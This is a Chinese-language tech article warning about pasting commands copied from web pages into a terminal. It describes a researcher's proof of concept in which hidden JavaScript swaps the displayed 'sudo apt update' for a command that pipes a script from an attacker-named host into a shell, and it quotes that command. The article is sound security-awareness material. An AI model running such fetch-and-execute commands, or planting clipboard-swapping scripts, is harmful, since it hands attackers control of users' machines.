从陌生网页上复制/贴上命令列要小心被黑

boyanx6个月前技术教程34

安全研究人员警告,HTML页面上的命令列可能藏匿恶意程序码,开发者稍有不察直接复制贴上终端时,可能就让黑客得以于程序中植入后门。

复制粘贴要当心,病毒代码在执行

一名安全研究人员Gabriel Friedlander近日警告,随手从网络上复制与贴上(Copy/Paste)命令列时要特别小心,因为黑客可能趁此骇进开发者的系统或应用程序。

Friedlander打造了一个概念性验证攻击手法,他设计一个假装可用来更新Ubuntu作业系统的命令列,该命令列显示的文字很简单,为「sudo apt update」,但当开发者复制它,并将它贴上记事本或终端时,它出现的却是「curl http[:]
//attacker-domain:8000/shell.sh | sh 」,若是直接贴入终端,它将立即执行。

这是因为Friedlander在此一HTML页面上藏匿了JavaScript程序码,而让开发者眼见的文字与贴上之后所呈现的内容完全不同。

Friedlander说,不管是新手或是熟练的开发者,都可能会从网络上复制命令列或部份程序码,但这是非常危险的行为,也许会让黑客直接于程序中植入后门,相关的攻击非常地简单,却可能带来极大的伤害,建议开发者应永远避免于终端贴上直接自网络上复制的命令列。

标签: css禁止复制

相关文章

从网站检查中复制CSS代码的最简单方法

在处理网站项目时,您是否曾经对使用开发工具感到沮丧?必须在您正在处理的网页和检查器之间来回切换以查看CSS并进行调整通常可能是一个挑战。值得庆幸的是,有一个浏览器扩展程序可以简化该过程:CSS Sca...

不要网上乱拷贝代码了!一段网上找的代码突然炸了!

碰到一个需求,给服某些要求的玩家的发送道具奖励,奖励的数量根据离线的天数计算。这个需求实现起来很简单,只需要在玩家上线的时候计算上次离线时间和当前时间间隔的天数,然后根据策划的算法,计算出道具种类与数...

网页不能复制粘贴?你会怎么办?

在浏览网络的时候,经常会看到一些特别值得收藏的好文章(就像本文所介绍的技巧非常值得珍藏哦),想要复制下来保存在电脑中。但限于某些网站页面的加密设置,单纯的在网页点击鼠标页面复制是无效的,咋办?不要想着...

网站内容禁止复制?教你5招,全网文字任你免费复制

在网上搜索资料的时候,我们常常需要将有用的内容复制下来。但你以为所有的网站内容都可以“复制-粘贴”吗?不难发现,很多网站在你选择复制的时候要么提示登录,要么提示付费。看着这些可望而不可及的资料内容,你...

电子文稿不能复制粘贴的破解方法

1、将Internet的安全级别设置为“高”。操作方法:①启动IE→点击菜单“工具”中“Internet选项”→点“安全”→自定义级别→选择“安全级-高”→确定→按F5“刷新”;这时你就可复制了,因为...

JS代码“隐形”加密

本文分享一种神奇的JS代码加密技术:能让加密的JS代码变的“隐形”,是真的隐形,让代码消失、不可见!效果展示eval("".split('\ufeff').map(fu...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。